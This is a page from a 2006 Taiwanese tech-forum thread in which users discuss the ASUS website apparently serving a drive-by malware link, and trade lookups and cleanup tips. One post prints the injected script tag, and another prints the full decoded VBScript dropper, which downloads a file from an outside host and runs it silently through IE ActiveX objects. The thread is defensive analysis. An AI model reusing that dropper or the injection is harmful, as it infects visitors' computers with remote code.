PCDVD數位科技討論區
第5頁 共6頁 « 第一 上一頁 2 3 4 5 6 下一頁
每頁顯示此主題的 10 個文章

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   系統組件 (https://www.pcdvd.com.tw/forumdisplay.php?f=19)
-   -   ASUS網站被加料了? (https://www.pcdvd.com.tw/showthread.php?t=679020)

HSM 2006-12-13 04:21 AM
已經安裝了 怎麼辦 但是埽毒 掃沒病毒...

艾魯 2006-12-13 04:33 AM
引用:
作者FlyNews
上了ASUS網站,重新整理一下,
雖然不會連上 http://www.hiet.tw/1.htm
但還是可在IE狀況列看到出現一下


而這個 hiet.tw的網域, 在 http://rs.twnic.net/ 查是這個人的
但資料也不夠,也沒有電話,真是奇怪!


Domain Name: hiet.tw

Contact:
liting

Record expires on 2007-10-20 (YYYY-MM-DD)
Record created on 2006-10-20 (YYYY-MM-DD)
Registrar: SEEDNET

好樣的,SEEDNET網域,那要抓人應該不是問題。
哪個笨賊放木馬連結還搞在台灣的...
還是那個網址被人挪用?

darksnow 2006-12-13 04:42 AM
引用:
作者HSM
已經安裝了 怎麼辦 但是埽毒 掃沒病毒...


如果你IE有定期更新,就不會中獎。
我先前實驗的是用WinXP SP2未更新的IE才會中

darksnow 2006-12-13 04:48 AM
引用:
作者艾魯
好樣的,SEEDNET網域,那要抓人應該不是問題。
哪個笨賊放木馬連結還搞在台灣的...
還是那個網址被人挪用?


下面寫seednet的意思是指那個DN是在seednet代理註冊的,不是在seednet網域喔。
不過也許不一定就是那DN所有人搞的,昨天在jp和global的網頁看到的木馬,
是放在 http://www.skys.com.tw/ 下面,猜測應該是被破台來偷放的

darksnow 2006-12-13 04:56 AM
引用:
作者FlyNews
後來再到 http://www.hiet.tw/1.htm 看了一下,一個空白的網頁, 裡面有個java的連結

<SCRIPT LANGUAGE="JavaScript" src="http://www.plmq.com/script/src/code.js"></script><SCRIPT LANGUAGE="JavaScript"> var v = "原本是一大串編碼,省略jbElEMSAgPSAiY2xzaSINCiAgICBjbElEMiAgPSAi"; document.write(aa(v,100));</SCRIPT>


而這個就是那個Java了! http://www.plmq.com/script/src/code.js
可以用文字檔的方式打開看看裡面的程式是什麼。


code.js解base64編碼的,用途是解後面那一大串編碼,
那串編碼的動作好像是去http://www.yyc8.com抓個東西來執行

小壞蛋 2006-12-16 09:53 AM
好棒的華碩....昨天晚上幫朋友查個皇家的位置,底下又出現wwx.hiet.tw/1.htx,心想慘了,果然又中標了...

F-SECURE又掃不到了,去WINDOWS底下把off1win.dll改個名字重開機似乎又沒事了

剛剛再去看華碩看,又不會連到hiet

建議要去華碩官網的,先不要點進去好了

媽的,哪個華碩的人再跟我說他們網頁沒毒的,我就把p5b-dlx塞到他xx裡

chanp 2006-12-16 12:52 PM
這只是表示華碩的網站已成駭客的目標....

清除後又被植入惡意代碼,大家上網自求多福!!

還好沒看到"華碩網站、姦若磐石"這一句話

SpeedRossi 2006-12-16 01:06 PM
好久之前華碩的網站好像一定要用IE才能正常瀏覽下載
現在可以用FF正常瀏覽了,也讓我躲過一截啦

冬之炎陽 2006-12-16 04:01 PM
引用:
作者darksnow
code.js解base64編碼的,用途是解後面那一大串編碼,
那串編碼的動作好像是去http://www.yyc8.com抓個東西來執行


那堆編碼過的文字解碼之後就是下面的程式碼 :p:p:p

代碼:
<html>
<scriptlanguage="VBScript">
onerrorresumenext
clID1="clsi"
clID2="d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1="Mic"
XML2="rosoft.XMLHTTP"
AdoSqa1="Adodb.S"
AdoSqa2="tream"
oGet="GET"
fname1="AdCount.com"
SFO="Scripting.FileSystemObject"
SApp="Shell.Application"
dl="http://www.yyc8.com/script/src/rss3.css"
Setdf=document.createElement("object")
df.setAttribute"classid",clID1&clID2
Setx=df.CreateObject(XML1&XML2,"")
setS=df.createobject(AdoSqa1&AdoSqa2,"")
S.type=1
x.OpenoGet,dl,False
x.Send
setF=df.createobject(SFO,"")
settmp=F.GetSpecialFolder(2)
fname1=F.BuildPath(tmp,fname1)
S.open
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject(SApp,"")
Q.ShellExecutefname1,"","","open",0
</script>
<head>
<title>InternetExplorer</title>
</head><body></body></html>

tvirus 2006-12-16 04:15 PM
C:\Documents and Settings\Administrator>ping www.hiet.tw

Pinging www.hiet.tw [210.59.231.234] with 32 bytes of data:

http://www.ripe.net/fcgi-bin/whois?...object_type=All

inetnum: 210.59.128.0 - 210.59.255.255
netname: HINET-TW

C:\Documents and Settings\Administrator>ping www.plmq.com

Pinging www.plmq.com [222.73.247.123] with 32 bytes of data:

http://www.ripe.net/fcgi-bin/whois?...object_type=All

inetnum: 222.64.0.0 - 222.73.255.255
netname: CHINANET-SH
descr: CHINANET shanghai province network

C:\Documents and Settings\Administrator>ping www.yyc8.com

Pinging www.yyc8.com [222.73.247.123] with 32 bytes of data:

台灣中途站為Hinet...
大陸終點站在北京...


所有的時間均為GMT +8。 現在的時間是09:06 AM.
第5頁 共6頁 « 第一 上一頁 2 3 4 5 6 下一頁
每頁顯示此主題的 10 個文章

vBulletin Version 3.0.1
powered_by_vbulletin 2025。